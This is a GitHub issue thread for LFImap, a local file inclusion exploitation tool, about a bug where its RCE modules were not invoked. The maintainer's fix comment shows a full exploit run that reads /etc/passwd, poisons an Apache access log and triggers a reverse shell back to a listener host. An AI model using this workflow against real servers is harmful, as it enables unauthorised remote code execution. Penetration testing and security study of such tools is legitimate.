search

hansmach1ne / LFImap

Local File Inclusion discovery and exploitation tool
Apache License 2.0
194 stars 29 forks source link

'-t' RCE modules are not initialized at all #95

Closed hansmach1ne closed 1 week ago

hansmach1ne commented 1 week ago

pwn() is not called when '-t' module finds the vulnerability

hansmach1ne commented 1 week ago

Fixed in https://github.com/hansmach1ne/LFImap/commit/dae069404ef1b704ccb238db117a05f02635edcd

└─$ python3 lfimap.py -U "94.237.63.201:50722?language" -t --lhost 10.10.15.203 --lport 99 -x -P "127.0.0.1:8080"

[i] Testing GET 'language' parameter...
[+] LFI -> 'http://94.237.63.201:50722?language=/etc/passwd'
[?] Checking if bash is available on the target system...
[*] Starting reverse listener on 0.0.0.0:99
[i] Enumerating file system to discover access log location...

[.] Located canary in target's access log at '/var/log/apache2/access.log'
[.] Poisoning access log with the shell code... 
[.] Trying to pop reverse shell to 10.10.15.203:99 using bash via access log poisoning...
[.] Executing stage 1 of the revshell payload...
[.] Executing stage 2 of the revshell payload. Check your listener...
<SNIP>